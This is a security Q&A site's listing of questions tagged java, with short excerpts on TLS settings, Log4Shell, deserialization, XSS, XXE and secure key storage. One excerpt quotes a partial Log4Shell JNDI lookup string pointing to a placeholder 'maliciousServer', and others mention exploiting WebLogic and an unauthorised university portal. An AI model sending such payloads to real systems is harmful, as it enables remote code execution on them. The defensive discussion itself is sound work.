Questions tagged [java]
Security aspects specific to the Java programming language, libraries, and virtual machine.
720 questions
3 votes, 7 answers, 3k views
How to Protect Commercial Java Software Running on Client Machines?
I am making my first commercial Java program and am worried about crack prevention. I would run it on the cloud, except it needs to run on their machine at a runtime. I have an obfuscator set up, but ...
6 votes, 3 answers, 1k views
Which is better, configurable TLS version, or hardcoded TLS version?
I am reviewing TLS configurations in my code, there are several places where there is TLS.
In these places, TLS version is hardcoded to TLSv1.2. I want to make sure that TLS 1.3 is also supported. To ...
0 votes, 2 answers, 221 views
Session token shown in the log file
I'm working on a Java web application running on Tomcat. A session token is generated and stored in a cookie when a user authenticates.
Unfortunately, when tracing is enabled, Tomcat dumps the value ...
3 votes, 2 answers, 313 views
Is this code vulnerable to injection?
I'm reviewing code which apparently ignores all security standards but doesn't seem to be exploitable due to its peculiar construction. The first stage is a Java Spring application and the name ...
1 vote, 0 answers, 170 views
Trying to reproduce Log4J vulnerability
I'm trying to reproduce the log4j vulnerability on my spring-boot java project. I know that versions from 2.0 to 2.14.1 are vulnerable, I'm using the 2.14.1 version but I'm not able to exploit it, ...
0 votes, 0 answers, 68 views
Which groovy is safe from gadget chains?
I have a java deserialization vulnerability, with a poc. The poc exploits using the groovy library, and the groovy version is 2.4.19.
When searching online for a CVE related to this gadget I couldn't ...
0 votes, 0 answers, 134 views
Should Maven Central artifacts containing known vulnerable artifacts be reported?
I have developed a tool that can find Maven Central JAR artifacts that contain classes from known vulnerable JAR artifacts. This includes but is not limited to fat (uber) JARs, JAR bundles, and ...
1 vote, 0 answers, 246 views
Google Login with idToken and JWT (Java)
We are integrating Google login in our app and we intend to use the idToken for authentication. We are already sending the idToken from the app to the back-end server, and intend to verify the token ...
5 votes, 2 answers, 2k views
Format string vulnerability in Java?
Can a non-sanitized user input result in a vulnerability if passed to System.out.printf (Or any equivalent function that takes a format)?
Example:
public class Demo {
public static void main(...
0 votes, 1 answer, 242 views
Is ZipSlip possible in Java without two dots?
I'm testing a Java application that tries to prevent ZipSlip by simply checking whether the filename contains ".." or "./"
Since it's not a web application, I guess encoding is not ...
1 vote, 1 answer, 3k views
Doing a diff between two keystore files
I have a keystore file with certificates and I want to compare if the second keystore has exactly the same contents as the first one.
One approach would be to extract the certificates using keytool ...
0 votes, 2 answers, 293 views
Post Exploitation in Oracle web logic server 10.35 (Oracle Linux Server 3.8)
Web Server : Oracle WebLogic 10.35
Machine : Oracle Linux Server 3.8
I was able to partially exploit this CVE. I can execute any command on server using HTTP request and redirecting its output to a ...
0 votes, 2 answers, 2k views
LFI to RCE in java EE Application
I found vulnerable end-points in my university's old portal. It should not be accessible but I found it somehow.
-> First end-point allows me to upload any kind of file on the following path : /home/...
0 votes, 1 answer, 612 views
With Response header having content-type: application/json, is it still possible to trigger XSS?
The application is responding using the user supplied request but the content type is set as application/json. Is it still possible to trigger XSS?
This is a language neutral question, it can be Java,...
1 vote, 2 answers, 883 views
Coverity flags as unsafe deserialisation. Is this vulnerable?
Coverity shows the block of code as unsafe deserialization:
String str = OBJECT_MAPPER.writeValueAsString(body); //Body is user controlled
Ferarri myclassobj = OBJECT_MAPPER.readValue(str, Ferarri....
0 votes, 1 answer, 229 views
SecureRandom safety?
I need to randomly pick 10 numbers from 1 to 2000. It is very important that this rng cannot be predicted/hacked in any way. Would this be a safe/proper way to do it:
int randomInt;
SecureRandom ...
1 vote, 1 answer, 291 views
Java Cryptography classes - program agnostic usage
We are planning on implementing encryption or digital signatures using any of the available classes provided by the Java Cryptography Architecture (e.g. KeyPair, MessageDigest, Cipher, KeyStore, ...
0 votes, 0 answers, 100 views
Is there any stable Java library to perform the same set of operations on USB tokens as javax.smartcardio does?
I need to perform a public/private key generation on USB devices and store private key parts on at least 3 USB tokens.
Java javax.smartcardio allows performing such an operation on smart cards that I ...
0 votes, 1 answer, 243 views
Information leakage from a API 404 response
Our consulting company has received a VAPT from a consulting company on behalf of a financial customer.
The application has an HR/group management module.
Normally employees are created by an ...
1 vote, 0 answers, 2k views
Disabling weak cipher suites in Tomcat does not work as expected
I have to get rid of so called "weak security" in a Tomcat application.
A penetration test identified services that accept connections with insecure TLS encryption and hashing algorithms: ...
1 vote, 1 answer, 667 views
Jsoup XSS attack with URL encoded input
I'm having a Spring Web Application that exposes REST APIs.
I have implemented XSS filter using Jsoup that strips the input using Safelist.NONE.
The penetration testing team raised a concern where the ...
1 vote, 1 answer, 121 views
Is there a way someone can read arrays of bytes which I send with java sockets while using TLS 1.2?
If anyone can answer me, please; I just need an answer. I know this maybe isn't the right place for this question.
I created a chatting app with sockets in Java 8 and I use TLS 1.2. My question is: Is there any way ...
1 vote, 1 answer, 2k views
Is DPAPI still valid option to protect eg. encryption key?
I have a Java client program for Windows having a properties file that I need to be able to encrypt (protect it if a malicious user accesses the server and properties file) but the client program of ...
1 vote, 0 answers, 677 views
Given a Java ECPublicKey ECDSA PublicKey, how can I build an SSH2 public key? [closed]
I have created an ECDSA key and now need to convert this to an SSH2 key.
final KeyPairGenerator keyGen = KeyPairGenerator.getInstance("ECDSA");
ECGenParameterSpec params = new ...
1 vote, 0 answers, 1k views
Why is there no fix for the commons beanutils Java deserialization gadget?
I recently came across a vulnerability which was caused by unsafe deserialization (Java) and the use of the Apache Commons library commons-beanutils. The ysoserial project references commons-beanutils ...
0 votes, 0 answers, 681 views
How to know which Jar/artifact a CVE affects?
When I'm trying to analyze CVEs to detect which jars are affected by the CVE, I'm getting confused.
Let's take as an example this CVE: CVE-2022-22978
In the description:
"In Spring Security ...
0 votes, 2 answers, 1k views
Is TLS version related to the server in a Java thick client application?
In a recent pentest (Java thick client), it was discovered by the pentesters that TLS version 1.3 is not supported. I'm investigating why it is not supported, so I was looking in the Java code for ...
2 votes, 1 answer, 190 views
Defining scope of a software pen test
If I own a software and I want to conduct a pen test with pen testers, should I define the scope or do the pen testers assess the software first and they define the scope? How does scope definition ...
2 votes, 2 answers, 875 views
Java support for TLS_DHE_RSA_WITH_AES_128_CCM
My test tool uses Java and I need it to use TLS_DHE_RSA_WITH_AES_128_CCM.
Does standard Java (Oracle) support CCM cipher suites?
I am seeing Oracle links mentioning CCM but am not able to make it work....
-1 votes, 1 answer, 479 views
Modifying cacerts at runtime
I have a containerized JVM application (multiple actually) running on kubernetes, which needs to trust additional custom/private CAs (which are not known beforehand, the application will be deployed ...
1 vote, 2 answers, 983 views
Java XXE vulnerability
If I am already using
xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
then do I also need to use
xmlInputFactory.setProperty("javax.xml.stream.isSupportingExternalEntities",...
3 votes, 0 answers, 2k views
How to Securely Store Database Password in Java .properties File
I would like to store my DB password in Java .property file and encrypt it using Jasypt. But from what I see, it just moves the problem from hiding the DB Password to hiding the encryption password.
I ...
17 votes, 2 answers, 3k views
How are code-branch side channel attacks mitigated on Java?
When you are working with secret keys, if your code branches unequally it could reveal bits of the secret keys via side channels. So for some algorithms it should branch uniformly independently of the ...
0 votes, 1 answer, 517 views
What to do if my java app is still vulnerable to log4shell after upgrading to the latest log4J?
My Java 11 application is being upgraded to fix the log4shell flaw. So first Spring Boot has been upgraded to the latest version.
As my project uses Maven to manage its dependencies, I set the log4j ...
0 votes, 1 answer, 320 views
How do different secret-key algorithms generate the same data?
How do different secret-key algorithms generate the same data?
In the snippet below, I use PBEWithMD5AndDES to produce one key, and PBEWithHmacSHA256AndAES_256 to produce another key, but with the ...
1 vote, 0 answers, 259 views
Insufficient SSL certificate pinning in a native Android app
I have implemented Certificate Pinning in a prototype of an Android app. Here are the steps I followed:
Converted .crt file to .bks file
Added the .bks file to the asset folder in project structure
...
0 votes, 1 answer, 761 views
Openssl and Let's Encrypt Cert Chain
I'm trying to understand openssl and some cert issues I was trying to track down. These certs were issued from Let's Encrypt. I will use their site as an example because I see the same behavior there. ...
0 votes, 1 answer, 3k views
Does alias in a truststore matter?
I was trying to add a new certificate to our truststore. But I got the "alias already exists" error.
I can't remove the old certificate yet, but I have to add the new certificate.
Will it matter if I ...
1 vote, 1 answer, 542 views
How do I test for Reflected XSS in webpage titles, url parameters and javascript variables?
I have a java web app. I'm using OWASP Java Encoder to encode for html, javascript and url components to mitigate reflected XSS. I'm new to this so I'm not sure on how to test on my web app for the ...
0 votes, 0 answers, 93 views
Third Party Java 8 Program Running in Java 11 vs Java 8?
If a vendor provides you with a program written for Java 8, is there any security advantage of running that program in the latest OpenJDK build of Java 11 instead of the latest OpenJDK build of Java 8?...
33 votes, 3 answers, 21k views
Am I protected from Log4j vulnerability if I run Java 8u121 or newer?
According to the notes for CVE-2021-44228 at mitre.org:
Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting "...
3 votes, 1 answer, 1k views
How to validate if Log4Shell patch is applied?
Is it enough to upgrade log4j-core and log4j-api to 2.15.0 but leave log4j-slf4j-impl, which is a binding library, to 2.14.1, given that mvn dependency:tree suggests that log4j-slf4j-impl:2.14.1 is ...
4 votes, 1 answer, 503 views
Does the log4j RCE vulnerability run even if the message is just a part of the logged string?
Does the JNDI URL need to be the full string being logged or could it be just a part of a logged string?
For example, if the code contains:
paramGivenFromOutside = "${jndi:ldap://maliciousServer:...
0 votes, 1 answer, 8k views
CheckMarx SSRF Vulnerability
I have a REST endpoint which takes a parameter dataSource as input and myService has the following logic.
@RequestMapping(value ="/save", method = RequestMethod.POST)
public List<String> find(@...
2 votes, 0 answers, 826 views
Does Java cache intermediate certificates fetched via AIA?
Java supports AIA chasing via the system property com.sun.security.enableAIAcaIssuers (which is disabled by default). There is some documentation available but it is pretty slim regarding details.
I ...
0 votes, 1 answer, 367 views
How to encrypt REST body with openid connect OIDC
The big picture is:
an Android application which authenticates the user with an external OpenID provider (such as Azure AD)
a Java EE server which exposes REST endpoints secured with the validation of ...
1 vote, 1 answer, 315 views
Generate key pair and entropy
I would like to use the method described in https://connect2id.com/products/nimbus-jose-jwt/examples/jwk-generation to generate a key pair in a java application:
import java.util.*;
import com....
0 votes, 0 answers, 136 views
SSL newbie - in which scenario a client needs a certificate?
I am new to SSL/TLS, and need some help with understanding.
I am running a java application, which is able to consume HTTP and HTTPS URLs as a client from the internet via httpClient. For that, I don'...
2 votes, 3 answers, 704 views
About vulnerability in the dependency
I have read many articles about the vulnerability in the program dependency, either direct or transitive.
Here are two questions that came to my mind.
If a dependency A has a vulnerability (Maybe has ...
0 votes, 1 answer, 280 views
Unrestricted file write in Java
Would it be possible to write a file to a directory outside of the uploads folder if the $ext variable is user controlled and unrestricted? The uploads directory is empty except for the freshly ...